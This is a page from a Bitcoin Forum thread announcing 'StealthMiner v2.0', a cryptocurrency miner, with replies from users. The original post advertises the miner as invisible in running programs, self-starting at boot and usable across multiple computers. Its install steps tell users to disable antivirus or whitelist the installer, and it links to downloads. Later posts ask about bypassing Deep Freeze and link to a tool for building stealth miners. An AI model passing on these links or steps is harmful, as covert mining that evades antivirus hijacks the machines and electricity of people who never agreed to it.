Bitcoin Forum
April 26, 2024, 01:47:19 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 [2] 3 4 »  All
  Print  
Author Topic: [ANN]StealthMiner v2.0 BEST STEALTH MULTICOIN CPU/GPU Miner [ANN]  (Read 24484 times)
trippcheck

Activity: 223
Merit: 100

View Profile
June 04, 2017, 04:48:25 AM

please add me to StealthMiner 2.0.

████→→       ● DeepOnion                                                                       ✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯
████→→       ● Tor integrated, 100% anonymous!                                ✯      Get Your FREE Coins NOW!      ✯
████→→       ● Free Airdrop! (No ICO, No Crowdfund)                       ✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
If you see garbage posts (off-topic, trolling, spam, no point, etc.), use the "report to moderator" links. All reports are investigated, though you will rarely be contacted about your reports.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
BLF

Activity: 1
Merit: 0

View Profile
June 05, 2017, 05:17:01 PM

please add me to StealthMiner 2.0. too!
hrh_fourtyseven

Activity: 58
Merit: 10

View Profile
June 06, 2017, 04:13:18 PM

Send me Version 2 too
Thanks
malev (OP)

Activity: 47

View Profile
June 07, 2017, 08:19:49 PM

StealthMiner v2.0 - The only MultiCurrency Stealth CPU/GPU Miner

Currently Available Coins to Mine:

StealthMiner 2.0 Released:

StealthMiner 2.0 is the ONLY cryptocurrency mining program that lets you currently mine 6 of the best cryptocoins in COMPLETE STEALTH MODE using both GPU and CPU at a perofrmance level that doesn't affect every day use of your computer.

StealthMiner 2.0 FEATURES:
  • Complete Stealth Miner so it cannot be noticed running in the background. It doesn't show in running programs. ONLY you know that the miner is running. You can run it on multiple computers.
  • Automatically switch between 6 coins to mine based on profitability
  • Smart start upon Windows startup. The program starts mining 5min after bootup to avoid any slow down
  • GPU and CPU mining together based on the activity of the computer. The program auto adjusts mining power so that your computer never slows down yet it mines the most coins possible. If your computer is just on and running it will use more resources etc...
  • Simple setup. All you need to do is open a text file and copy past the pool address and your coins' wallet address and you are ready to go.

How to Install StealthMiner 2.0:

1, Download the latest version of StealthMiner: https://mega.nz/#!gOhBUYib!wyLajvOYBe8f-Iy1N4cKh4akD5MIMjB3UFOH7KKDrr0
2, Unzip the Rar into a folder
3, Open autorun.txt file and type in your address and password after the command lines you see. DO NOT DELETE THE COMMAND LINES. You can insert a line for each coin or the coins you want to mine. The program will know what to mine based on which pool servers you save.
Example for Monero: -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
Example for Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
4, Just SAVE the file as is.
5, Run StealthMinerInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
6, HERE BE VERY CAREFUL AND MAKE SURE TO CLICK THINGS THE WAY ITS HERE
7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining message.

You are all set. you have started mining. You will be able to check your wallet balance and see your coins accumulate.
malev (OP)

View Profile
June 07, 2017, 08:20:37 PM

all the people that commented can download StealthMiner 2.0 and so as the public now. enjoy  Wink
Cryptoguru

Activity: 16

View Profile
June 07, 2017, 09:13:09 PM

this is so damn cool. thanks so much. currently testing it with monero to see how it compares to the StealthMiner v1. any more coins that will be added:
malev (OP)

View Profile
June 08, 2017, 06:50:01 PM

thx

payout are made when ?

payouts happen on the mining pools you indicate during the setup of the miner. My software is a miner only it doesnt hold or distribute any of your coins.
varnima

View Profile
June 08, 2017, 09:31:22 PM

first i couldnt alocate the file autorun.txt, maybe you ment autorun.inf, but there wasnt a autorun.txt in my rar file. second when i tried to run keys it was ok, but when i pushed run install i got this mistake the "system cannot find the file specified", what am i doing wrong ?
hrh_fourtyseven

Activity: 58
Merit: 10

View Profile
June 09, 2017, 06:33:37 AM

Thanks for your great work and nice idea

First thing your miner need is Logging in a simple text
there is no logging at all and we dont know if it is running or not? is it working correct? is it using cpu, vga or both? how much is hashrate? and...
Second thing is a little more options... for example how many threads it should use?
yiaou_chong1985

View Profile
July 20, 2017, 08:57:56 AM
Last edit: July 21, 2017, 09:15:42 AM by yiaou_chong1985

first i couldnt alocate the file autorun.txt, maybe you ment autorun.inf, but there wasnt a autorun.txt in my rar file. second when i tried to run keys it was ok, but when i pushed run install i got this mistake the "system cannot find the file specified", what am i doing wrong ?

Running Win 10 x64

Exactly the same problem as described above.

Another problem is that, If I run it, the process doesn't seem to start at all. The windowsdriver.exe sits with 0% in the task manager and dies after a few moments.
If I'm running the WindowsDriver.exe directly it complains about pool parameters and closes itself.
[error]  POOL response data: <---

And yes - I'd like to verify if it's working correctly.
It would be nice to call the program with a parameter for enabling logging into the same directory

Last EDIT: And it would be nice if you explain the input for the autorun.inf for every coin, not just for 2 of them, because it's some kind of guessing which parameters you need for bytecoin etc.
incredibili

View Profile
September 01, 2017, 12:06:55 PM

Hello!
Anyone knows the ANTPOOL command line to put into the autorun.inf file?
thx
Pseudonim

Activity: 3

View Profile
September 04, 2017, 01:02:27 AM

Hello everyone,

I have same problem and I cannot find autorun.txt. Did you mean autorun.txt?
And yes, it would be nice to show us how to configure parametres for all coin, there is a lot od newbies here  Smiley
One more question about utillization rate. I have amd ryzen 1700x , and I'm wondering can your miner utilize all core while cpu is on idle, or miner utilize just 1-2 core?

thans
dx_twisted

Activity: 294
Merit: 114

View Profile
September 26, 2017, 03:21:24 AM

StealthMiner v2.0 - The only MultiCurrency Stealth CPU/GPU Miner

Currently Available Coins to Mine:

StealthMiner 2.0 Released:

StealthMiner 2.0 is the ONLY cryptocurrency mining program that lets you currently mine 6 of the best cryptocoins in COMPLETE STEALTH MODE using both GPU and CPU at a perofrmance level that doesn't affect every day use of your computer.

StealthMiner 2.0 FEATURES:
  • Complete Stealth Miner so it cannot be noticed running in the background. It doesn't show in running programs. ONLY you know that the miner is running. You can run it on multiple computers.
  • Automatically switch between 6 coins to mine based on profitability
  • Smart start upon Windows startup. The program starts mining 5min after bootup to avoid any slow down
  • GPU and CPU mining together based on the activity of the computer. The program auto adjusts mining power so that your computer never slows down yet it mines the most coins possible. If your computer is just on and running it will use more resources etc...
  • Simple setup. All you need to do is open a text file and copy past the pool address and your coins' wallet address and you are ready to go.

How to Install StealthMiner 2.0:

1, Download the latest version of StealthMiner: https://mega.nz/#!gOhBUYib!wyLajvOYBe8f-Iy1N4cKh4akD5MIMjB3UFOH7KKDrr0
2, Unzip the Rar into a folder
3, Open autorun.txt file and type in your address and password after the command lines you see. DO NOT DELETE THE COMMAND LINES. You can insert a line for each coin or the coins you want to mine. The program will know what to mine based on which pool servers you save.
Example for Monero: -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
Example for Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
4, Just SAVE the file as is.
5, Run StealthMinerInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
6, HERE BE VERY CAREFUL AND MAKE SURE TO CLICK THINGS THE WAY ITS HERE
7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining message.

You are all set. you have started mining. You will be able to check your wallet balance and see your coins accumulate.

Hello @malev, I would like to know if your stealth miner can bypass deepfreeze? Will it survive once the computer restart or do I have to disable DF? Also, does your miner works w/ windows xp computers? Thanks!
Gew00nOwen

View Profile
September 26, 2017, 04:48:22 PM

Nice work but please what are the command parameters.
And when i launch StalthMinerInstaller.exe and first install the keys and than when i press Run Install it throws an error i will send a pic!
https://imgur.com/a/3PFM7
crazyfock

View Profile
October 10, 2017, 08:23:38 PM

Nice work but please what are the command parameters.
And when i launch StalthMinerInstaller.exe and first install the keys and than when i press Run Install it throws an error i will send a pic!
https://imgur.com/a/3PFM7

I have the same exact issue identical to the pic Gew00nOwen posted. Running Windows 7 on this pc, is the miner successfully working/running?  How do I fix it? I also agree with a previous posters request for a log file option. Thanks for your hard work on this cool app!
Vagmaster

Activity: 5

View Profile
October 12, 2017, 06:30:39 PM

following for the error
how do we fix this ?
pascal.james

Activity: 4

View Profile
October 13, 2017, 08:28:27 PM

just build your own stealth miner with this:
https://mega.nz/#!9a5kCZDD!j7QXNYgCxGCKzzyhy9dURshPUIODZeEPIUfYGRlW2lw

https://i.imgur.com/tDGqpRr.png
Vagmaster

View Profile
October 14, 2017, 11:35:57 AM

that is not working for me
stab not found.
pascal.james

Activity: 4

View Profile
October 14, 2017, 12:26:49 PM

You will need Windows x64. 32 Bit is not working.
Vagmaster

View Profile
October 14, 2017, 02:18:42 PM

I tried to dl but when the dl finishes i can not locate the file
chrome blocks it .
when i manage to dl and disable
i get stab not found
got x64 w7 and running it like admin.
Pages: « 1 [2] 3 4 »  All
  Print